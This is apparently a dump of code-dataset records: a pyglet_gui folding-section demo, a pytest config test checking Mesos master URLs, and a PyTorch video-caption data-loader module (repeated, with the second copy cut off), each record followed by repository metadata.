from setup import * from pyglet_gui.manager import Manager from pyglet_gui.containers import VerticalContainer from pyglet_gui.document import Document from pyglet_gui.constants import ANCHOR_CENTER, HALIGN_LEFT from pyglet_gui.gui import SectionHeader, FoldingSection, Frame from pyglet_gui.scrollable import Scrollable from pyglet_gui.theme import Theme theme = Theme({"font": "Lucida Grande", "font_size": 12, "text_color": [255, 255, 255, 255], "gui_color": [255, 0, 0, 255], "section": { "right": { "image": { "source": "line.png", "region": [2, 0, 6, 4], "frame": [0, 4, 4, 0], "padding": [0, 0, 0, 6] } }, "font_size": 14, "opened": { "image": { "source": "book-open.png" } }, "closed": { "image": { "source": "book.png" } }, "left": { "image": { "source": "line.png", "region": [0, 0, 6, 4], "frame": [2, 4, 4, 0], "padding": [0, 0, 0, 6] } }, "center": { "image": { "source": "line.png", "region": [2, 0, 4, 4], "frame": [0, 4, 4, 0], "padding": [0, 0, 0, 6] } } }, "frame": { "image": { "source": "panel.png", "frame": [8, 8, 16, 16], "padding": [16, 16, 8, 8] } } }, resources_path='../theme/') content = Frame( Scrollable( VerticalContainer([SectionHeader("Folding"), Document("Click on the section headers below to open them.", width=300), FoldingSection("Folding 1", Document("This is the first folding.", width=300)), FoldingSection("Folding 2", Document("This is the second folding.", width=300), is_open=False), FoldingSection("Folding 3", Document("This is the third folding.", width=300), is_open=False), ], align=HALIGN_LEFT), height=400) ) Manager( content , window=window, batch=batch, anchor=ANCHOR_CENTER, theme=theme) pyglet.app.run()
none
1
2.348646
2
tests/conf_test.py
b2wdigital/asgard-events-indexer
0
6618596
from indexer.conf import settings from tests.base import BaseTestCase class ConfTest(BaseTestCase): async def test_load_mesos_urls(self): self.assertEqual( settings.MESOS_MASTER_URLS, ["http://127.0.0.1:5050", "http://10.0.0.1:5050"], )
from indexer.conf import settings from tests.base import BaseTestCase class ConfTest(BaseTestCase): async def test_load_mesos_urls(self): self.assertEqual( settings.MESOS_MASTER_URLS, ["http://127.0.0.1:5050", "http://10.0.0.1:5050"], )
none
1
1.898819
2
util/data_provider.py
Recmoon/MAN
2
6618597
<filename>util/data_provider.py import torch import torch.utils.data as data import numpy as np import json as jsonmod from basic.util import getVideoId from vocab import clean_str import sys VIDEO_MAX_LEN=64 def collate_frame_gru_fn(data): """ Build mini-batch tensors from a list of (video, caption) tuples. """ # Sort a data list by caption length if len(data[0]) == 10: if data[0][1] is not None: data.sort(key=lambda x: len(x[1]), reverse=True) videos, captions, cap_bows, idxs, cap_ids, video_ids, videos_target, video_ids_target, cap_tensor_target, cap_bow_target= zip(*data) # Merge videos (convert tuple of 1D tensor to 4D tensor) video_lengths = [min(VIDEO_MAX_LEN,len(frame)) for frame in videos] frame_vec_len = len(videos[0][0]) vidoes = torch.zeros(len(videos), max(video_lengths), frame_vec_len) videos_origin = torch.zeros(len(videos), frame_vec_len) vidoes_mask = torch.zeros(len(videos), max(video_lengths)) for i, frames in enumerate(videos): end = video_lengths[i] vidoes[i, :end, :] = frames[:end,:] videos_origin[i,:] = torch.mean(frames,0) vidoes_mask[i,:end] = 1.0 video_lengths_target = [min(VIDEO_MAX_LEN,len(frame)) for frame in videos_target] frame_vec_len = len(videos_target[0][0]) vidoes_target = torch.zeros(len(videos_target), max(video_lengths_target), frame_vec_len) videos_origin_target = torch.zeros(len(videos_target), frame_vec_len) vidoes_mask_target = torch.zeros(len(videos_target), max(video_lengths_target)) for i, frames in enumerate(videos_target): end = video_lengths_target[i] vidoes_target[i, :end, :] = frames[:end,:] videos_origin_target[i,:] = torch.mean(frames,0) vidoes_mask_target[i,:end] = 1.0 if captions[0] is not None: # Merge captions (convert tuple of 1D tensor to 2D tensor) lengths = [len(cap) for cap in captions] target = torch.zeros(len(captions), max(lengths)).long() words_mask = torch.zeros(len(captions), max(lengths)) for i, cap in enumerate(captions): end = lengths[i] target[i, :end] = cap[:end] words_mask[i, :end] = 1.0 
else: target = None lengths = None words_mask = None if cap_tensor_target[0] is not None: # Merge captions (convert tuple of 1D tensor to 2D tensor) lengths_target = [len(cap) for cap in cap_tensor_target] target_target = torch.zeros(len(cap_tensor_target), max(lengths_target)).long() words_mask_target = torch.zeros(len(cap_tensor_target), max(lengths_target)) for i, cap in enumerate(cap_tensor_target): end = lengths_target[i] target_target[i, :end] = cap[:end] words_mask_target[i, :end] = 1.0 else: target_target = None lengths_target = None words_mask_target = None cap_bows = torch.stack(cap_bows, 0) if cap_bows[0] is not None else None cap_bow_target = torch.stack(cap_bow_target, 0) if cap_bow_target[0] is not None else None video_data = (vidoes, videos_origin, video_lengths, vidoes_mask) text_data = (target, cap_bows, lengths, words_mask) text_data_target = (target_target, cap_bow_target, lengths_target, words_mask_target) video_data_target = (vidoes_target, videos_origin_target, video_lengths_target, vidoes_mask_target) return video_data, text_data, idxs, cap_ids, video_ids, video_ids_target, video_data_target, text_data_target elif len(data[0]) == 14: if data[0][1] is not None: data.sort(key=lambda x: len(x[1]), reverse=True) videos, captions, cap_bows, idxs, cap_ids, video_ids, videos_target, video_ids_target, cap_tensor_target, cap_bow_target, videos_source2, video_ids_source2, cap_tensor_source2, cap_bow_source2= zip(*data) # Merge videos (convert tuple of 1D tensor to 4D tensor) video_lengths = [min(VIDEO_MAX_LEN,len(frame)) for frame in videos] frame_vec_len = len(videos[0][0]) vidoes = torch.zeros(len(videos), max(video_lengths), frame_vec_len) videos_origin = torch.zeros(len(videos), frame_vec_len) vidoes_mask = torch.zeros(len(videos), max(video_lengths)) for i, frames in enumerate(videos): end = video_lengths[i] vidoes[i, :end, :] = frames[:end,:] videos_origin[i,:] = torch.mean(frames,0) vidoes_mask[i,:end] = 1.0 video_lengths_target = 
[min(VIDEO_MAX_LEN,len(frame)) for frame in videos_target] frame_vec_len = len(videos_target[0][0]) vidoes_target = torch.zeros(len(videos_target), max(video_lengths_target), frame_vec_len) videos_origin_target = torch.zeros(len(videos_target), frame_vec_len) vidoes_mask_target = torch.zeros(len(videos_target), max(video_lengths_target)) for i, frames in enumerate(videos_target): end = video_lengths_target[i] vidoes_target[i, :end, :] = frames[:end,:] videos_origin_target[i,:] = torch.mean(frames,0) vidoes_mask_target[i,:end] = 1.0 video_lengths_source2 = [min(VIDEO_MAX_LEN,len(frame)) for frame in videos_source2] frame_vec_len = len(videos_source2[0][0]) vidoes_source2 = torch.zeros(len(videos_source2), max(video_lengths_source2), frame_vec_len) videos_origin_source2 = torch.zeros(len(videos_source2), frame_vec_len) vidoes_mask_source2 = torch.zeros(len(videos_source2), max(video_lengths_source2)) for i, frames in enumerate(videos_source2): end = video_lengths_source2[i] vidoes_source2[i, :end, :] = frames[:end,:] videos_origin_source2[i,:] = torch.mean(frames,0) vidoes_mask_source2[i,:end] = 1.0 if captions[0] is not None: # Merge captions (convert tuple of 1D tensor to 2D tensor) lengths = [len(cap) for cap in captions] target = torch.zeros(len(captions), max(lengths)).long() words_mask = torch.zeros(len(captions), max(lengths)) for i, cap in enumerate(captions): end = lengths[i] target[i, :end] = cap[:end] words_mask[i, :end] = 1.0 else: target = None lengths = None words_mask = None if cap_tensor_target[0] is not None: # Merge captions (convert tuple of 1D tensor to 2D tensor) lengths_target = [len(cap) for cap in cap_tensor_target] target_target = torch.zeros(len(cap_tensor_target), max(lengths_target)).long() words_mask_target = torch.zeros(len(cap_tensor_target), max(lengths_target)) for i, cap in enumerate(cap_tensor_target): end = lengths_target[i] target_target[i, :end] = cap[:end] words_mask_target[i, :end] = 1.0 else: target_target = None 
lengths_target = None words_mask_target = None if cap_tensor_source2[0] is not None: # Merge captions (convert tuple of 1D tensor to 2D tensor) lengths_source2 = [len(cap) for cap in cap_tensor_source2] target_source2 = torch.zeros(len(cap_tensor_source2), max(lengths_source2)).long() words_mask_source2 = torch.zeros(len(cap_tensor_source2), max(lengths_source2)) for i, cap in enumerate(cap_tensor_source2): end = lengths_source2[i] target_source2[i, :end] = cap[:end] words_mask_source2[i, :end] = 1.0 else: target_source2 = None lengths_source2 = None words_mask_source2 = None cap_bows = torch.stack(cap_bows, 0) if cap_bows[0] is not None else None cap_bow_target = torch.stack(cap_bow_target, 0) if cap_bow_target[0] is not None else None cap_bow_source2 = torch.stack(cap_bow_source2, 0) if cap_bow_source2[0] is not None else None video_data = (vidoes, videos_origin, video_lengths, vidoes_mask) text_data = (target, cap_bows, lengths, words_mask) text_data_target = (target_target, cap_bow_target, lengths_target, words_mask_target) video_data_target = (vidoes_target, videos_origin_target, video_lengths_target, vidoes_mask_target) text_data_source2 = (target_source2, cap_bow_source2, lengths_source2, words_mask_source2) video_data_source2 = (vidoes_source2, videos_origin_source2, video_lengths_source2, vidoes_mask_source2) return video_data, text_data, idxs, cap_ids, video_ids, video_ids_target, video_data_target, text_data_target, video_ids_source2, video_data_source2, text_data_source2 else: if data[0][1] is not None: data.sort(key=lambda x: len(x[1]), reverse=True) videos, captions, cap_bows, idxs, cap_ids, video_ids = zip(*data) # Merge videos (convert tuple of 1D tensor to 4D tensor) video_lengths = [min(VIDEO_MAX_LEN,len(frame)) for frame in videos] frame_vec_len = len(videos[0][0]) vidoes = torch.zeros(len(videos), max(video_lengths), frame_vec_len) videos_origin = torch.zeros(len(videos), frame_vec_len) vidoes_mask = torch.zeros(len(videos), max(video_lengths)) 
for i, frames in enumerate(videos): end = video_lengths[i] vidoes[i, :end, :] = frames[:end,:] videos_origin[i,:] = torch.mean(frames,0) vidoes_mask[i,:end] = 1.0 if captions[0] is not None: # Merge captions (convert tuple of 1D tensor to 2D tensor) lengths = [len(cap) for cap in captions] target = torch.zeros(len(captions), max(lengths)).long() words_mask = torch.zeros(len(captions), max(lengths)) for i, cap in enumerate(captions): end = lengths[i] target[i, :end] = cap[:end] words_mask[i, :end] = 1.0 else: target = None lengths = None words_mask = None cap_bows = torch.stack(cap_bows, 0) if cap_bows[0] is not None else None video_data = (vidoes, videos_origin, video_lengths, vidoes_mask) text_data = (target, cap_bows, lengths, words_mask) return video_data, text_data, idxs, cap_ids, video_ids def collate_frame(data): videos, idxs, video_ids = zip(*data) # Merge videos (convert tuple of 1D tensor to 4D tensor) video_lengths = [min(VIDEO_MAX_LEN,len(frame)) for frame in videos] frame_vec_len = len(videos[0][0]) vidoes = torch.zeros(len(videos), max(video_lengths), frame_vec_len) videos_origin = torch.zeros(len(videos), frame_vec_len) vidoes_mask = torch.zeros(len(videos), max(video_lengths)) for i, frames in enumerate(videos): end = video_lengths[i] vidoes[i, :end, :] = frames[:end,:] videos_origin[i,:] = torch.mean(frames,0) vidoes_mask[i,:end] = 1.0 video_data = (vidoes, videos_origin, video_lengths, vidoes_mask) return video_data, idxs, video_ids def collate_text(data): if data[0][0] is not None: data.sort(key=lambda x: len(x[0]), reverse=True) captions, cap_bows, idxs, cap_ids = zip(*data) if captions[0] is not None: # Merge captions (convert tuple of 1D tensor to 2D tensor) lengths = [len(cap) for cap in captions] target = torch.zeros(len(captions), max(lengths)).long() words_mask = torch.zeros(len(captions), max(lengths)) for i, cap in enumerate(captions): end = lengths[i] target[i, :end] = cap[:end] words_mask[i, :end] = 1.0 else: target = None lengths = 
None words_mask = None cap_bows = torch.stack(cap_bows, 0) if cap_bows[0] is not None else None text_data = (target, cap_bows, lengths, words_mask) return text_data, idxs, cap_ids class Dataset4DualEncoding(data.Dataset): """ Load captions and video frame features by pre-trained CNN model. """ def __init__(self, cap_file, visual_feat, bow2vec, vocab, n_caption=None, video2frames=None, visual_feat_target=None, video2frames_target=None, caption_file_target=None, visual_feat_source2=None, video2frames_source2=None, caption_file_source2=None): # Captions self.captions = {} self.captions_target = {} self.captions_source2 = {} self.cap_ids = [] self.cap_ids_target = [] self.cap_ids_source2 = [] self.visual_feat = visual_feat self.video2frames = video2frames self.visual_feat_target = visual_feat_target self.video2frames_target = video2frames_target self.visual_feat_source2 = visual_feat_source2 self.video2frames_source2 = video2frames_source2 with open(cap_file, 'r') as cap_reader: for line in cap_reader.readlines(): cap_id, caption = line.strip().split(' ', 1) self.captions[cap_id] = caption self.cap_ids.append(cap_id) if visual_feat_target!=None and video2frames_target!=None: with open(caption_file_target, 'r') as cap_reader: for line in cap_reader.readlines(): cap_id, caption = line.strip().split(' ', 1) self.captions_target[cap_id] = caption self.cap_ids_target.append(cap_id) if visual_feat_source2!=None and video2frames_source2!=None: with open(caption_file_source2, 'r') as cap_reader: for line in cap_reader.readlines(): cap_id, caption = line.strip().split(' ', 1) self.captions_source2[cap_id] = caption self.cap_ids_source2.append(cap_id) self.bow2vec = bow2vec self.vocab = vocab self.length = len(self.cap_ids) # self.cap_ids_target = self.cap_ids_target * 2 print(self.length) print(len(self.cap_ids_target)) # if n_caption is not None: # assert len(self.video_ids) * n_caption == self.length, "%d != %d" % (len(self.video_ids) * n_caption, self.length) def 
__getitem__(self, index): cap_id = self.cap_ids[index] video_id = getVideoId(cap_id) frame_list = self.video2frames[video_id] frame_vecs = [] for frame_id in frame_list: frame_vecs.append(self.visual_feat.read_one(frame_id)) frames_tensor = torch.Tensor(frame_vecs) caption = self.captions[cap_id] if self.bow2vec is not None: cap_bow = self.bow2vec.mapping(caption) if cap_bow is None: cap_bow = torch.zeros(self.bow2vec.ndims) else: cap_bow = torch.Tensor(cap_bow) else: cap_bow = None if self.vocab is not None: tokens = clean_str(caption) caption = [] caption.append(self.vocab('<start>')) caption.extend([self.vocab(token) for token in tokens]) caption.append(self.vocab('<end>')) cap_tensor = torch.Tensor(caption) else: cap_tensor = None if self.visual_feat_target != None and self.video2frames_target != None: cap_id_target = self.cap_ids_target[index] video_id_target = getVideoId(cap_id_target) frame_list = self.video2frames_target[video_id_target] frame_vecs_target = [] for frame_id in frame_list: frame_vecs_target.append(self.visual_feat_target.read_one(frame_id)) frames_tensor_target = torch.Tensor(frame_vecs_target) caption_target = self.captions_target[cap_id_target] # caption_target = self.cap_ids_target[index] # video_id_target = 'a' # frame_list = self.video2frames_target[self.target_video_id_list[index]] # frame_vecs_target = [] # for frame_id in frame_list: # frame_vecs_target.append(self.visual_feat_target.read_one(frame_id)) # frames_tensor_target = torch.Tensor(frame_vecs_target) if self.bow2vec is not None: cap_bow_target = self.bow2vec.mapping(caption_target) if cap_bow_target is None: cap_bow_target = torch.zeros(self.bow2vec.ndims) else: cap_bow_target = torch.Tensor(cap_bow_target) else: cap_bow_target = None if self.vocab is not None: tokens = clean_str(caption_target) caption_target = [] caption_target.append(self.vocab('<start>')) caption_target.extend([self.vocab(token) for token in tokens]) caption_target.append(self.vocab('<end>')) 
cap_tensor_target = torch.Tensor(caption_target) else: cap_tensor_target = None if self.visual_feat_source2 != None and self.video2frames_source2 != None: cap_id_source2 = self.cap_ids_source2[index] video_id_source2 = getVideoId(cap_id_source2) frame_list = self.video2frames_source2[video_id_source2] frame_vecs_source2 = [] for frame_id in frame_list: frame_vecs_source2.append(self.visual_feat_source2.read_one(frame_id)) frames_tensor_source2 = torch.Tensor(frame_vecs_source2) caption_source2 = self.captions_source2[cap_id_source2] # caption_source2 = self.cap_ids_source2[index] # video_id_source2 = 'a' # frame_list = self.video2frames_source2[self.source2_video_id_list[index]] # frame_vecs_source2 = [] # for frame_id in frame_list: # frame_vecs_source2.append(self.visual_feat_source2.read_one(frame_id)) # frames_tensor_source2 = torch.Tensor(frame_vecs_source2) if self.bow2vec is not None: cap_bow_source2 = self.bow2vec.mapping(caption_source2) if cap_bow_source2 is None: cap_bow_source2 = torch.zeros(self.bow2vec.ndims) else: cap_bow_source2 = torch.Tensor(cap_bow_source2) else: cap_bow_source2 = None if self.vocab is not None: tokens = clean_str(caption_source2) caption_source2 = [] caption_source2.append(self.vocab('<start>')) caption_source2.extend([self.vocab(token) for token in tokens]) caption_source2.append(self.vocab('<end>')) cap_tensor_source2 = torch.Tensor(caption_source2) else: cap_tensor_source2 = None return frames_tensor, cap_tensor, cap_bow, index, cap_id, video_id, frames_tensor_target, video_id_target, cap_tensor_target, cap_bow_target, frames_tensor_source2, video_id_source2, cap_tensor_source2, cap_bow_source2 else: return frames_tensor, cap_tensor, cap_bow, index, cap_id, video_id, frames_tensor_target, video_id_target, cap_tensor_target, cap_bow_target else: return frames_tensor, cap_tensor, cap_bow, index, cap_id, video_id def __len__(self): return self.length class VisDataSet4DualEncoding(data.Dataset): """ Load video frame features by 
pre-trained CNN model. """ def __init__(self, visual_feat, video2frames=None): self.visual_feat = visual_feat self.video2frames = video2frames self.video_ids = video2frames.keys() self.length = len(self.video_ids) def __getitem__(self, index): video_id = self.video_ids[index] frame_list = self.video2frames[video_id] frame_vecs = [] for frame_id in frame_list: frame_vecs.append(self.visual_feat.read_one(frame_id)) frames_tensor = torch.Tensor(frame_vecs) return frames_tensor, index, video_id def __len__(self): return self.length class TxtDataSet4DualEncoding(data.Dataset): """ Load captions """ def __init__(self, cap_file, bow2vec, vocab): # Captions self.captions = {} self.cap_ids = [] with open(cap_file, 'r') as cap_reader: for line in cap_reader.readlines(): cap_id, caption = line.strip().split(' ', 1) self.captions[cap_id] = caption self.cap_ids.append(cap_id) self.bow2vec = bow2vec self.vocab = vocab self.length = len(self.cap_ids) def __getitem__(self, index): cap_id = self.cap_ids[index] caption = self.captions[cap_id] if self.bow2vec is not None: cap_bow = self.bow2vec.mapping(caption) if cap_bow is None: cap_bow = torch.zeros(self.bow2vec.ndims) else: cap_bow = torch.Tensor(cap_bow) else: cap_bow = None if self.vocab is not None: tokens = clean_str(caption) caption = [] caption.append(self.vocab('<start>')) caption.extend([self.vocab(token) for token in tokens]) caption.append(self.vocab('<end>')) cap_tensor = torch.Tensor(caption) else: cap_tensor = None return cap_tensor, cap_bow, index, cap_id def __len__(self): return self.length def get_data_loaders(cap_files, visual_feats, vocab, bow2vec, batch_size=100, num_workers=2, n_caption=2, video2frames=None, video2frames_target=None, visual_feats_target=None, caption_file_target=None, multi_flag=0): """ Returns torch.utils.data.DataLoader for train and validation datasets Args: cap_files: caption files (dict) keys: [train, val] visual_feats: image feats (dict) keys: [train, val] """ if 
video2frames_target!=None and visual_feats_target!=None: if multi_flag == 0: dset = {'train': Dataset4DualEncoding(cap_files['train'], visual_feats['train'], bow2vec, vocab, video2frames=video2frames['train'], video2frames_target=video2frames_target['train'], visual_feat_target=visual_feats_target['train'], caption_file_target=caption_file_target), 'val': Dataset4DualEncoding(cap_files['val'], visual_feats['val'], bow2vec, vocab, n_caption, video2frames=video2frames['val']), 'test': Dataset4DualEncoding(cap_files['test'], visual_feats['test'], bow2vec, vocab, n_caption, video2frames=video2frames['test'])} else: dset = {'train': Dataset4DualEncoding(cap_files['train'], visual_feats['train'], bow2vec, vocab, video2frames=video2frames['train'], video2frames_target=video2frames_target['train'], visual_feat_target=visual_feats_target['train'], caption_file_target=caption_file_target, visual_feat_source2=visual_feats['train2'], video2frames_source2=video2frames['train2'], caption_file_source2=cap_files['train2']), 'val': Dataset4DualEncoding(cap_files['val'], visual_feats['val'], bow2vec, vocab, n_caption, video2frames=video2frames['val']), 'test': Dataset4DualEncoding(cap_files['test'], visual_feats['test'], bow2vec, vocab, n_caption, video2frames=video2frames['test'])} else: dset = {'train': Dataset4DualEncoding(cap_files['train'], visual_feats['train'], bow2vec, vocab, video2frames=video2frames['train']), 'val': Dataset4DualEncoding(cap_files['val'], visual_feats['val'], bow2vec, vocab, n_caption, video2frames=video2frames['val']), 'test': Dataset4DualEncoding(cap_files['test'], visual_feats['test'], bow2vec, vocab, n_caption, video2frames=video2frames['test'])} data_loaders = {x: torch.utils.data.DataLoader(dataset=dset[x], batch_size=batch_size, shuffle=(x=='train'), pin_memory=True, num_workers=num_workers, collate_fn=collate_frame_gru_fn) for x in ['train', 'val', 'test']} return data_loaders def get_test_data_loaders(cap_files, visual_feats, vocab, bow2vec, 
batch_size=100, num_workers=2, n_caption=2, video2frames = None): """ Returns torch.utils.data.DataLoader for test dataset Args: cap_files: caption files (dict) keys: [test] visual_feats: image feats (dict) keys: [test] """ dset = {'test': Dataset4DualEncoding(cap_files['test'], visual_feats['test'], bow2vec, vocab, n_caption, video2frames = video2frames['test'])} data_loaders = {x: torch.utils.data.DataLoader(dataset=dset[x], batch_size=batch_size, shuffle=False, pin_memory=True, num_workers=num_workers, collate_fn=collate_frame_gru_fn) for x in cap_files } return data_loaders def get_vis_data_loader(vis_feat, batch_size=100, num_workers=2, video2frames=None): dset = VisDataSet4DualEncoding(vis_feat, video2frames) data_loader = torch.utils.data.DataLoader(dataset=dset, batch_size=batch_size, shuffle=False, pin_memory=True, num_workers=num_workers, collate_fn=collate_frame) return data_loader def get_txt_data_loader(cap_file, vocab, bow2vec, batch_size=100, num_workers=2): dset = TxtDataSet4DualEncoding(cap_file, bow2vec, vocab) data_loader = torch.utils.data.DataLoader(dataset=dset, batch_size=batch_size, shuffle=False, pin_memory=True, num_workers=num_workers, collate_fn=collate_text) return data_loader if __name__ == '__main__': pass
<filename>util/data_provider.py import torch import torch.utils.data as data import numpy as np import json as jsonmod from basic.util import getVideoId from vocab import clean_str import sys VIDEO_MAX_LEN=64 def collate_frame_gru_fn(data): """ Build mini-batch tensors from a list of (video, caption) tuples. """ # Sort a data list by caption length if len(data[0]) == 10: if data[0][1] is not None: data.sort(key=lambda x: len(x[1]), reverse=True) videos, captions, cap_bows, idxs, cap_ids, video_ids, videos_target, video_ids_target, cap_tensor_target, cap_bow_target= zip(*data) # Merge videos (convert tuple of 1D tensor to 4D tensor) video_lengths = [min(VIDEO_MAX_LEN,len(frame)) for frame in videos] frame_vec_len = len(videos[0][0]) vidoes = torch.zeros(len(videos), max(video_lengths), frame_vec_len) videos_origin = torch.zeros(len(videos), frame_vec_len) vidoes_mask = torch.zeros(len(videos), max(video_lengths)) for i, frames in enumerate(videos): end = video_lengths[i] vidoes[i, :end, :] = frames[:end,:] videos_origin[i,:] = torch.mean(frames,0) vidoes_mask[i,:end] = 1.0 video_lengths_target = [min(VIDEO_MAX_LEN,len(frame)) for frame in videos_target] frame_vec_len = len(videos_target[0][0]) vidoes_target = torch.zeros(len(videos_target), max(video_lengths_target), frame_vec_len) videos_origin_target = torch.zeros(len(videos_target), frame_vec_len) vidoes_mask_target = torch.zeros(len(videos_target), max(video_lengths_target)) for i, frames in enumerate(videos_target): end = video_lengths_target[i] vidoes_target[i, :end, :] = frames[:end,:] videos_origin_target[i,:] = torch.mean(frames,0) vidoes_mask_target[i,:end] = 1.0 if captions[0] is not None: # Merge captions (convert tuple of 1D tensor to 2D tensor) lengths = [len(cap) for cap in captions] target = torch.zeros(len(captions), max(lengths)).long() words_mask = torch.zeros(len(captions), max(lengths)) for i, cap in enumerate(captions): end = lengths[i] target[i, :end] = cap[:end] words_mask[i, :end] = 1.0 
else: target = None lengths = None words_mask = None if cap_tensor_target[0] is not None: # Merge captions (convert tuple of 1D tensor to 2D tensor) lengths_target = [len(cap) for cap in cap_tensor_target] target_target = torch.zeros(len(cap_tensor_target), max(lengths_target)).long() words_mask_target = torch.zeros(len(cap_tensor_target), max(lengths_target)) for i, cap in enumerate(cap_tensor_target): end = lengths_target[i] target_target[i, :end] = cap[:end] words_mask_target[i, :end] = 1.0 else: target_target = None lengths_target = None words_mask_target = None cap_bows = torch.stack(cap_bows, 0) if cap_bows[0] is not None else None cap_bow_target = torch.stack(cap_bow_target, 0) if cap_bow_target[0] is not None else None video_data = (vidoes, videos_origin, video_lengths, vidoes_mask) text_data = (target, cap_bows, lengths, words_mask) text_data_target = (target_target, cap_bow_target, lengths_target, words_mask_target) video_data_target = (vidoes_target, videos_origin_target, video_lengths_target, vidoes_mask_target) return video_data, text_data, idxs, cap_ids, video_ids, video_ids_target, video_data_target, text_data_target elif len(data[0]) == 14: if data[0][1] is not None: data.sort(key=lambda x: len(x[1]), reverse=True) videos, captions, cap_bows, idxs, cap_ids, video_ids, videos_target, video_ids_target, cap_tensor_target, cap_bow_target, videos_source2, video_ids_source2, cap_tensor_source2, cap_bow_source2= zip(*data) # Merge videos (convert tuple of 1D tensor to 4D tensor) video_lengths = [min(VIDEO_MAX_LEN,len(frame)) for frame in videos] frame_vec_len = len(videos[0][0]) vidoes = torch.zeros(len(videos), max(video_lengths), frame_vec_len) videos_origin = torch.zeros(len(videos), frame_vec_len) vidoes_mask = torch.zeros(len(videos), max(video_lengths)) for i, frames in enumerate(videos): end = video_lengths[i] vidoes[i, :end, :] = frames[:end,:] videos_origin[i,:] = torch.mean(frames,0) vidoes_mask[i,:end] = 1.0 video_lengths_target = 
[min(VIDEO_MAX_LEN,len(frame)) for frame in videos_target] frame_vec_len = len(videos_target[0][0]) vidoes_target = torch.zeros(len(videos_target), max(video_lengths_target), frame_vec_len) videos_origin_target = torch.zeros(len(videos_target), frame_vec_len) vidoes_mask_target = torch.zeros(len(videos_target), max(video_lengths_target)) for i, frames in enumerate(videos_target): end = video_lengths_target[i] vidoes_target[i, :end, :] = frames[:end,:] videos_origin_target[i,:] = torch.mean(frames,0) vidoes_mask_target[i,:end] = 1.0 video_lengths_source2 = [min(VIDEO_MAX_LEN,len(frame)) for frame in videos_source2] frame_vec_len = len(videos_source2[0][0]) vidoes_source2 = torch.zeros(len(videos_source2), max(video_lengths_source2), frame_vec_len) videos_origin_source2 = torch.zeros(len(videos_source2), frame_vec_len) vidoes_mask_source2 = torch.zeros(len(videos_source2), max(video_lengths_source2)) for i, frames in enumerate(videos_source2): end = video_lengths_source2[i] vidoes_source2[i, :end, :] = frames[:end,:] videos_origin_source2[i,:] = torch.mean(frames,0) vidoes_mask_source2[i,:end] = 1.0 if captions[0] is not None: # Merge captions (convert tuple of 1D tensor to 2D tensor) lengths = [len(cap) for cap in captions] target = torch.zeros(len(captions), max(lengths)).long() words_mask = torch.zeros(len(captions), max(lengths)) for i, cap in enumerate(captions): end = lengths[i] target[i, :end] = cap[:end] words_mask[i, :end] = 1.0 else: target = None lengths = None words_mask = None if cap_tensor_target[0] is not None: # Merge captions (convert tuple of 1D tensor to 2D tensor) lengths_target = [len(cap) for cap in cap_tensor_target] target_target = torch.zeros(len(cap_tensor_target), max(lengths_target)).long() words_mask_target = torch.zeros(len(cap_tensor_target), max(lengths_target)) for i, cap in enumerate(cap_tensor_target): end = lengths_target[i] target_target[i, :end] = cap[:end] words_mask_target[i, :end] = 1.0 else: target_target = None 
lengths_target = None words_mask_target = None if cap_tensor_source2[0] is not None: # Merge captions (convert tuple of 1D tensor to 2D tensor) lengths_source2 = [len(cap) for cap in cap_tensor_source2] target_source2 = torch.zeros(len(cap_tensor_source2), max(lengths_source2)).long() words_mask_source2 = torch.zeros(len(cap_tensor_source2), max(lengths_source2)) for i, cap in enumerate(cap_tensor_source2): end = lengths_source2[i] target_source2[i, :end] = cap[:end] words_mask_source2[i, :end] = 1.0 else: target_source2 = None lengths_source2 = None words_mask_source2 = None cap_bows = torch.stack(cap_bows, 0) if cap_bows[0] is not None else None cap_bow_target = torch.stack(cap_bow_target, 0) if cap_bow_target[0] is not None else None cap_bow_source2 = torch.stack(cap_bow_source2, 0) if cap_bow_source2[0] is not None else None video_data = (vidoes, videos_origin, video_lengths, vidoes_mask) text_data = (target, cap_bows, lengths, words_mask) text_data_target = (target_target, cap_bow_target, lengths_target, words_mask_target) video_data_target = (vidoes_target, videos_origin_target, video_lengths_target, vidoes_mask_target) text_data_source2 = (target_source2, cap_bow_source2, lengths_source2, words_mask_source2) video_data_source2 = (vidoes_source2, videos_origin_source2, video_lengths_source2, vidoes_mask_source2) return video_data, text_data, idxs, cap_ids, video_ids, video_ids_target, video_data_target, text_data_target, video_ids_source2, video_data_source2, text_data_source2 else: if data[0][1] is not None: data.sort(key=lambda x: len(x[1]), reverse=True) videos, captions, cap_bows, idxs, cap_ids, video_ids = zip(*data) # Merge videos (convert tuple of 1D tensor to 4D tensor) video_lengths = [min(VIDEO_MAX_LEN,len(frame)) for frame in videos] frame_vec_len = len(videos[0][0]) vidoes = torch.zeros(len(videos), max(video_lengths), frame_vec_len) videos_origin = torch.zeros(len(videos), frame_vec_len) vidoes_mask = torch.zeros(len(videos), max(video_lengths)) 
for i, frames in enumerate(videos): end = video_lengths[i] vidoes[i, :end, :] = frames[:end,:] videos_origin[i,:] = torch.mean(frames,0) vidoes_mask[i,:end] = 1.0 if captions[0] is not None: # Merge captions (convert tuple of 1D tensor to 2D tensor) lengths = [len(cap) for cap in captions] target = torch.zeros(len(captions), max(lengths)).long() words_mask = torch.zeros(len(captions), max(lengths)) for i, cap in enumerate(captions): end = lengths[i] target[i, :end] = cap[:end] words_mask[i, :end] = 1.0 else: target = None lengths = None words_mask = None cap_bows = torch.stack(cap_bows, 0) if cap_bows[0] is not None else None video_data = (vidoes, videos_origin, video_lengths, vidoes_mask) text_data = (target, cap_bows, lengths, words_mask) return video_data, text_data, idxs, cap_ids, video_ids def collate_frame(data): videos, idxs, video_ids = zip(*data) # Merge videos (convert tuple of 1D tensor to 4D tensor) video_lengths = [min(VIDEO_MAX_LEN,len(frame)) for frame in videos] frame_vec_len = len(videos[0][0]) vidoes = torch.zeros(len(videos), max(video_lengths), frame_vec_len) videos_origin = torch.zeros(len(videos), frame_vec_len) vidoes_mask = torch.zeros(len(videos), max(video_lengths)) for i, frames in enumerate(videos): end = video_lengths[i] vidoes[i, :end, :] = frames[:end,:] videos_origin[i,:] = torch.mean(frames,0) vidoes_mask[i,:end] = 1.0 video_data = (vidoes, videos_origin, video_lengths, vidoes_mask) return video_data, idxs, video_ids def collate_text(data): if data[0][0] is not None: data.sort(key=lambda x: len(x[0]), reverse=True) captions, cap_bows, idxs, cap_ids = zip(*data) if captions[0] is not None: # Merge captions (convert tuple of 1D tensor to 2D tensor) lengths = [len(cap) for cap in captions] target = torch.zeros(len(captions), max(lengths)).long() words_mask = torch.zeros(len(captions), max(lengths)) for i, cap in enumerate(captions): end = lengths[i] target[i, :end] = cap[:end] words_mask[i, :end] = 1.0 else: target = None lengths = 
